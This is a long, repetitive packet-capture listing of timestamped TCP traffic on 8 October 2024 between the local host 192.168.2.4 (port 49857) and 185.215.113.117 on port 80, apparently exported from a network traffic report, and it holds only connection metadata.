                                                                                                                Oct 8, 2024 05:00:13.043699026 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.043720007 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.043730974 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.043752909 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.043764114 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.043786049 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.043796062 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.043828964 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.128163099 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.128206015 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.128254890 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.128293991 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.169850111 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.169886112 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.169917107 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.169940948 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.169970989 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.170042992 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.170070887 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.170114040 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.170120001 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.170150995 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.170160055 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.170185089 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.170200109 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.170217991 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.170223951 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.170257092 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.170331001 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.170372009 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.170378923 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.170411110 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.170419931 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.170442104 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.170450926 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.170475006 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.170483112 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.170509100 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.170514107 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.170542955 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.170550108 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.170574903 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.170583963 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.170618057 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.170628071 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.170665026 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.170670986 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.170696974 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.170706034 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.170737982 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.170912027 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.170942068 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.170963049 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.170973063 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.170985937 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.171005964 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.171013117 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.171037912 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.171046972 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.171070099 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.171078920 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.171111107 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.171147108 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.171176910 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.171188116 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.171207905 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.171217918 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.171238899 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.171248913 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.171269894 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.171281099 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.171302080 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.171312094 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.171334982 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.171344042 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.171365023 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.171374083 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.171405077 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.171416998 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.171458960 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.171691895 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.171725988 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.171740055 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.171766996 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.171772957 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.171803951 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.171814919 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.171837091 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.171845913 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.171869040 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.171876907 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.171910048 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.171983957 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.172025919 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.172097921 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.172127962 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.172148943 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.172163010 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.172168016 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.172203064 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.172209024 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.172240019 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.172250032 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.172270060 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.172281027 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.172302008 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.172308922 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.172332048 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.172342062 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.172363997 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.172375917 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.172394037 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.172404051 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.172425985 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.172432899 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.172456980 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.172466993 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.172489882 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.172497034 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.172517061 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.172529936 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.172558069 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.174851894 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.174882889 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.174902916 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.174913883 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.175003052 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.175034046 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.175076008 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.175076008 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.175082922 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.175113916 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.175115108 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.175136089 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.175144911 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.175156116 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.175177097 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.175190926 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.175209045 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.175223112 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.175240040 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.175255060 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.175271988 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.175286055 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.175303936 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.175317049 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.175335884 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.175348997 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.175368071 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.175381899 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.175412893 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.175421000 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.175452948 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.175467014 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.175484896 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.175498009 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.175529957 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.175852060 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.175883055 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.175903082 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.175915956 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.175926924 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.175946951 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.175961018 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.175978899 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.175987959 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.176026106 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.255341053 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.255358934 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.255373955 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.255398035 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.255435944 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.255599022 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.256517887 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.256541014 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.256556034 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.256568909 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.256596088 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.256598949 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.256613970 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.256628990 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.256639957 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.256664991 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.256738901 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.256794930 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.256808996 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.256835938 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.256850004 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.256942034 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.256954908 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.256968021 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.256989956 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.256990910 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.257004023 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.257006884 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.257018089 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.257030964 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.257035017 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.257045031 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.257061958 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.257065058 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.257077932 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.257091045 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.257091999 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.257107019 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.257112980 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.257132053 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.257155895 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.298950911 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.298985958 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.299019098 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.299132109 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.299146891 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.299173117 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.299221992 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.299252987 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.299283028 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.299314022 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.299319983 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.299319983 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.299319983 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.299345970 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.299375057 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.299443960 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.299475908 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.299506903 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.299555063 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.299585104 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.299614906 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.299634933 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.299634933 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.299664021 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.299695015 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.299741983 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.299777031 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.299798965 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.299804926 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.299820900 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.299850941 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.299882889 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.299890041 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.299913883 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.299945116 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.299962044 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.299977064 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.299988985 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.300007105 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.300024986 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.300054073 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.300055981 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.300092936 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.300101995 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.300124884 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.300137997 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.300156116 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.300168991 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.300188065 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.300203085 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.300235033 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.300236940 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.300282001 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.300283909 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.300316095 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.300329924 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.300348043 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.300365925 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.300395012 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.300395012 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.300431013 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.300440073 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.300462961 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.300477028 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.300494909 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.300523996 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.300540924 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.300544977 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.300575018 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.300606012 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.300626040 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.300638914 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.300648928 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.300672054 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.300685883 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.300713062 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.300719023 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.300750971 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.300761938 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.300781965 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.300813913 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.300829887 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.300859928 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.300860882 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.300906897 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.300909996 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.300937891 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.300951958 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.300970078 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.300982952 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.301001072 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.301016092 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.301032066 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.301045895 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.301064968 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.301076889 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.301110029 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.301114082 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.301145077 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.301158905 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.301177025 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.301187992 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.301208019 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.301214933 CEST4985780192.168.2.4185.215.113.117
